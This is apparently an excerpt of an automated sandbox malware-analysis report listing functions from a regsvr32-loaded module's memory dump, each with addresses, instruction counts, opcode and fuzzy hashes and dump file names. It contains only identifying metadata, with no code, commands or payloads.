                                • Opcode ID: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                • Instruction ID: 047403745ffdf525a43130cb5f0cbada7355141308e198c8a6f422d75d1d2ed5
                                • Opcode Fuzzy Hash: b44782859c9866ecf0a367f2980fc160796e99ead2e04d39a5c7d0e6a088d4a1
                                • Instruction Fuzzy Hash: FB51D0B090078A8BCF4CDF64C8964EE7BB1FB48344F418A1DE966A6350D3B49665CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800254E4 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 8:*
                                • API String ID: 0-724269717
                                • Opcode ID: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                • Instruction ID: 711009871b2250b35f00fe0553413368f045348530dbac453829dc2cbdd56c12
                                • Opcode Fuzzy Hash: e3fa9c188720ae3383b8778e69c2785bb5a3de525a41bd4bbc95f284b45543ac
                                • Instruction Fuzzy Hash: DE519FB491074A8FCF48CF68D48A4DEBFB0FB68398F604519EC56AA250D37496A4CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180001B8C Relevance: 1.4, Strings: 1, Instructions: 101COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: rX
                                • API String ID: 0-981687150
                                • Opcode ID: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                • Instruction ID: b6d69565f821f61997a80366e3bba675c41573294b632c1fc230c031640afc4a
                                • Opcode Fuzzy Hash: 72326b85271c7a937057e165988be4f12753e05fcac8eb4b8ea4e21389b64c69
                                • Instruction Fuzzy Hash: 4151AFB090034E9FCB88CF64D48A5DE7FF0FB68398F204619E856A6250D7B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002A6BC Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Mf_
                                • API String ID: 0-1332758469
                                • Opcode ID: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                • Instruction ID: 588ebf95624ee4adfb38f08f1f8e1a2e631849e2b9196c961bccb52f3d8eb30d
                                • Opcode Fuzzy Hash: fb88f28924fad9aaa6151cff677ca0e0efdf4f904b7a048c95071875f4937966
                                • Instruction Fuzzy Hash: 72413A7051034E8BDB49DF24C88A6DE3FA0FB28388F254619FC4AA6250D774DA99CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800010E8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X
                                • API String ID: 0-1684620495
                                • Opcode ID: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                • Instruction ID: f9643209bdbdb1888c2e59a9774da8228396ec72f530c9748c2220c9be6d5877
                                • Opcode Fuzzy Hash: 95d6dfd1a906a0706b046fd694ee3460552bea9bfe9cb5e2a40ac0cd4b690da8
                                • Instruction Fuzzy Hash: BC41B2B050C3858BC368DF69D49A51BFFF0FB8A344F104A1DF68686660D7B6D985CB06
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002A0F8 Relevance: 1.3, Strings: 1, Instructions: 97COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *ZP
                                • API String ID: 0-3785686542
                                • Opcode ID: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                • Instruction ID: cd700ac0e72fdea100a6c678007ea8a5747de393b09cc95ae15ed8a735d2c9a6
                                • Opcode Fuzzy Hash: 124ec41d44a3523d05a66609c609173a78c4b3624f4a4e6496b4e9e6556fc9cc
                                • Instruction Fuzzy Hash: C351A3B490038EDFCB89CF64D88A5CE7BB0FB14358F104A19F826A6260D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000FE08 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m9
                                • API String ID: 0-3356931199
                                • Opcode ID: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                • Instruction ID: d52339509a2a8a66acc38e501e73e88f1da459d23edb33c529fdb618239225c9
                                • Opcode Fuzzy Hash: 59db1ee33f63e0a2717973542dec2f5b5e1c1c898ff6bc1b3de0a09d2022d082
                                • Instruction Fuzzy Hash: AC41DFB091074E8BDB48CF68C48A5DE7FF0FB58388F24821DE816A6250D3B496A4CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180029F5C Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 4pI
                                • API String ID: 0-4229698716
                                • Opcode ID: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                • Instruction ID: 0770ca01e568b3f0bfe5184ab77212d0ab800e579d58ef6f76929ab8cb5ebb0d
                                • Opcode Fuzzy Hash: 2de104f479e2b2f02d24493f8855e4bc5dcdc9c63e6a51756a92895ab6f7f3eb
                                • Instruction Fuzzy Hash: 2741F4B190074E8BCF48CFA8C89A5DE7FB0FB58358F10561DE826A6250D3B49658CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000BC70 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: T7
                                • API String ID: 0-2187045315
                                • Opcode ID: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                • Instruction ID: e445a35d468e15d444dcf9e81ad6d1cbfbebd9662ebae466ae50992912f39bd9
                                • Opcode Fuzzy Hash: 5b373cdcbe2aa1956c24a8ef4c3b2010382917b3ef4417ae897a4905ea2e7e5d
                                • Instruction Fuzzy Hash: 6B41E3B191074A8BCF48CF68C48A4DE7FB0FF68398F214609E856A6250D3B496A5CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002143C Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Y[
                                • API String ID: 0-1945238269
                                • Opcode ID: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                • Instruction ID: 277041adf1a083522e20f1ff56a0db14356653c4c70dd43ccf4c86f47916e8c3
                                • Opcode Fuzzy Hash: 31c1f4254bc290cabebbeaadf273c7758becd057e90036f86d7834daa6438d30
                                • Instruction Fuzzy Hash: C941E67091038E8FCB48DF68C88A5DE7BB1FB58358F10461DEC6AAB250D3B49664CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180029DF0 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [
                                • API String ID: 0-784033777
                                • Opcode ID: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                • Instruction ID: 430e1a122fe0b20a7e1e6f195b5c5d6ab4e3c741a825a8fe397d5d7cdac5a180
                                • Opcode Fuzzy Hash: 593e2affadbd7d43363044155888d79a97a338ed63d972069ddab33477027861
                                • Instruction Fuzzy Hash: 2841E4B090074E8BCB48CF64C89A4EE7FF1FB68358F11461DE856A6250D3B496A5CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000B948 Relevance: 1.3, Strings: 1, Instructions: 84COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 9 m
                                • API String ID: 0-1920745034
                                • Opcode ID: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                • Instruction ID: 3be0e43e89224af25a3a96d245761afcbfad2e5132df1735d4859c98edb6e384
                                • Opcode Fuzzy Hash: 403251bbe0303adcdb9fc718cab8a153fac6736b8b0f21ecfcc0465734d374f6
                                • Instruction Fuzzy Hash: 5D41A6B180038ECFCB48CF68C88A5DE7FB1FB58358F114A19F869A6210D7B49665CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180003840 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: wo0
                                • API String ID: 0-1782833155
                                • Opcode ID: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                • Instruction ID: 9062cfcdbd96f40b118b25d613ee2554a2eb62b456f013d12e1abcba11dd4c76
                                • Opcode Fuzzy Hash: 915272897a82389ccaff6fb74a1b6d3f763f551119c92165f64424d72f92453c
                                • Instruction Fuzzy Hash: AD4104B090034E8BCB48CF68C4865DE7FB0FB48358F11861DE85AAA250D7749664CFC4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800257C0 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0FT
                                • API String ID: 0-3306264968
                                • Opcode ID: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                • Instruction ID: 6bc0069c9e8fc616ccef226ca938112ebcbb35ca2f33a2ab28ad344b092e513b
                                • Opcode Fuzzy Hash: 221a7c3e7820f489f33ab0bfd813c90db956588b7e3f278aa32cbc5897504973
                                • Instruction Fuzzy Hash: 30419FB090078E8FCB49CF64C88A5DE7BB0FB18358F104A19E866A7250D7B8D665CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000E638 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [Mh<
                                • API String ID: 0-3342980100
                                • Opcode ID: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                • Instruction ID: 3dfa530075d16dbdc0ab74c4fd592fdc9016efe2b3d8749faa49a3b984689735
                                • Opcode Fuzzy Hash: 8db4eb38f9ab2c3bc7d36487ff8b598b8cd98b11ddd9dbc7aed51384deea61bf
                                • Instruction Fuzzy Hash: 3D41B4B090034E8BDB88DF68C88A4DE7FF0FB58398F104619E855A6250D37496A4CFC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000C740 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: [*y
                                • API String ID: 0-3642367475
                                • Opcode ID: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                • Instruction ID: f49b88a051f724710f0cfdc48a2fab0be3c7391659c99e254e23c0044fb95fb4
                                • Opcode Fuzzy Hash: f920a7f17afa669f85dd4fa2bbc3f052cb99f05070bc78a3fd5f717c453881c3
                                • Instruction Fuzzy Hash: 9F318C746183858B8748DF28D45641ABBE1FBCC308F405B2DF8CAAB291D7789641CB8B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800117C4 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: dk
                                • API String ID: 0-2586313868
                                • Opcode ID: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                • Instruction ID: bd21a50a93d9ce141822b95cdb4ee263f008649e2ad7f0911c2a62c734e6813a
                                • Opcode Fuzzy Hash: 8a4805f75226fc2840e2c7b063b7b1e39b1ba6f4f5ce1306a123ad924c24cf9d
                                • Instruction Fuzzy Hash: 8631E4B0508B808BC75CDF28C49A51BBBF1FBC6354F504A1CF686863A0DBB6D849CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000B444 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: m?@
                                • API String ID: 0-4017832957
                                • Opcode ID: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                • Instruction ID: 763f89865c62d32814b91696e152b9bff8d9fc03c4acc356d14baff2dc9750fc
                                • Opcode Fuzzy Hash: 92bb4875fae3dfbb536cc4a594f9b8f02b4b9fef725d60d218a6fcb850c1db5e
                                • Instruction Fuzzy Hash: B231BF752187858BC749DF28C04A41ABBE1FB8D30CF504B2DF4CAA6350D778D616CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800064D0 Relevance: 1.3, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: MR
                                • API String ID: 0-1985102067
                                • Opcode ID: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                • Instruction ID: 3dc758c2b0da019c4ef40f7354f1f5afd613488c2e2992af3e697213e5bda16f
                                • Opcode Fuzzy Hash: c3045b5f67f41fb122cd1cd8de18bcca47d48181f2768d112050a64545bdb3cc
                                • Instruction Fuzzy Hash: 9F215CB05187808BD749DF28C55941EBBE1BB9D30CF804B2DF4CAAA251D778DA05CF4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180010050 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: h{9
                                • API String ID: 0-709585855
                                • Opcode ID: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                • Instruction ID: 28d7748f9e23597285172eede27c795ca80d4d45ffdf147c2eecc812d7a7424c
                                • Opcode Fuzzy Hash: 158519ec253ad62ee934b2a1f06c22473a728e5d40c1cbc8d8e2591bd6c1f9a1
                                • Instruction Fuzzy Hash: A22180B152D785AFC788DF28C59991ABBE0FB98308F806E1DF9868A250D374D545CB43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800036A8 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: =WQ
                                • API String ID: 0-979633440
                                • Opcode ID: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                • Instruction ID: f1c989dca105177ef840caf4573424004201902730bc760d24db79eb0592445f
                                • Opcode Fuzzy Hash: beecb343f63eb420ad30c3b234d671f41fcffe89ae230601040905a52fbe6922
                                • Instruction Fuzzy Hash: 2C2146746187848B8749DF28C44A51ABBE1BB8D30CF804B1DF8CAAB250D7789A05CB4A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800202E0 Relevance: .3, Instructions: 312COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                • Instruction ID: c77f93fcecba916d7a728a8c6eb3e78c0c4fd01b54dcd62d4346d4040ea08623
                                • Opcode Fuzzy Hash: 0d58b218a6fad6bc529337baac5d9ed9f8b1cbf9dbb0a3b92ec118c03c99fb86
                                • Instruction Fuzzy Hash: 28E11E7090470D8FCF59DF68D446AEE7BB6FB48344F504129EC4EAB251DB74AA08CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002A840 Relevance: .2, Instructions: 180COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                • Instruction ID: 37013b96f87cdafdf9e9430ef7fa874701b46d6ad591addafa58d16b7588ecf0
                                • Opcode Fuzzy Hash: 1c8b8be56366865ecfdde9c8b2ec8895e219799960cb59c8d6409a7e773344f9
                                • Instruction Fuzzy Hash: 7E811370D047098FDB89CFA8D4856EEBBF1FB48314F14812EE846B6250CB788A49CF59
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180025E88 Relevance: .2, Instructions: 167COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                • Instruction ID: 9c3afdfbfdf497047419e96e23ac648a32a0c35cf7c10b77ff2162508d5b9c58
                                • Opcode Fuzzy Hash: 636ed3c89b38e63114f2d2672b542ea9429d7597145989221425ac881483aa9e
                                • Instruction Fuzzy Hash: 68715B70A0460D8FCFA9DF64D0857EE77F2FB48348F109169E856972A2DB74DA18CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000E278 Relevance: .1, Instructions: 146COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                • Instruction ID: 96a2ca05932f578597b6f31f20a9b51789f655d9034ffcd243468df0dde1503e
                                • Opcode Fuzzy Hash: 62b2812e5277d79cf71890da185327c00cb0182960b11156e794a9778dcccdd1
                                • Instruction Fuzzy Hash: 8B6108B050424D8FCB99CF28C48A6DA7FE0FB58348F61422DF84AA6250D778D694CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180027C28 Relevance: .1, Instructions: 135COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                • Instruction ID: e11998f87687b7015f7b025411e2dba788bee123d684f62271b2fcc2a6602c8d
                                • Opcode Fuzzy Hash: 0a7e039c7e162bbace75073517b23d1c0edb14752be4eceffb74d3575dc747b7
                                • Instruction Fuzzy Hash: 74516C3011C7889FD7A9DF28C48A7ABBBF2FB88354F405A1DE4CA83251D775A5468B43
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001BF70 Relevance: .1, Instructions: 112COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 37b3c9751f9c0622dad5cee6893bdb18b89ef97b8e375e51f8b49718ad0ca1ed
                                • Instruction ID: 3c9e139cfc3177b9e6430d12f2245ff46c98974f9447e7844960b67abc7cc201
                                • Opcode Fuzzy Hash: 37b3c9751f9c0622dad5cee6893bdb18b89ef97b8e375e51f8b49718ad0ca1ed
                                • Instruction Fuzzy Hash: 2C416E705197449FD7D5CF28C489B5EBBE0FB88744F80A92DF485C2291CB74C9498B03
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180021754 Relevance: .1, Instructions: 109COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d93e85a75c27503c9e550547e6f4dbe74bfd5b550d549da600d4a1fb4778da09
                                • Instruction ID: 8d3aa2995036c6943faeb837d6d259061f9fd1ebb01e44e177952bfba46c1523
                                • Opcode Fuzzy Hash: d93e85a75c27503c9e550547e6f4dbe74bfd5b550d549da600d4a1fb4778da09
                                • Instruction Fuzzy Hash: BC51B5B190038E9FCB48CF68D8865DE7BF0FB48358F508A19F826A7250D3B49664CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180023220 Relevance: .1, Instructions: 108COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                • Instruction ID: 3bfbec68728c413781f4eceae801228648357d86044db0a2bb780f5116396d21
                                • Opcode Fuzzy Hash: c2a73fccebe1b17c37a08eaad88bc03e676d8e4e44166d1bd6bc2a62feffe697
                                • Instruction Fuzzy Hash: 4951B5B190074E8FCB48DFA8D88A5DE7BB1FB48348F04861DE826A7350D3B49564CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180014E98 Relevance: .1, Instructions: 100COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                • Instruction ID: 53b90e1c5486c9cc5d3a4e2843fa79abd377b3644fddba8a35b35de5b3b72a9d
                                • Opcode Fuzzy Hash: 4330d8994c454f3a4ce2cb979804135e217ee49caa662d464dea2a0ef5ce2a30
                                • Instruction Fuzzy Hash: AA51A4B590038E8FCF48DF64C88A5DE7BB1FB48348F014A19E86AA6350D7B4D665CF85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180003D18 Relevance: .1, Instructions: 99COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                • Instruction ID: e1ff16132d2196f3f75472eef2dbafaed56c0de40c9f91af0ed0f4743424dce2
                                • Opcode Fuzzy Hash: f6e19dd2ecc4b4f98e7bd80107de5ee987440c0ef4aaf5382ea96953c73351d3
                                • Instruction Fuzzy Hash: 7241E3B190034A8FCB48CF68C8865DE7FB1FB58358F10861DE85AAA360D77496A4CFD5
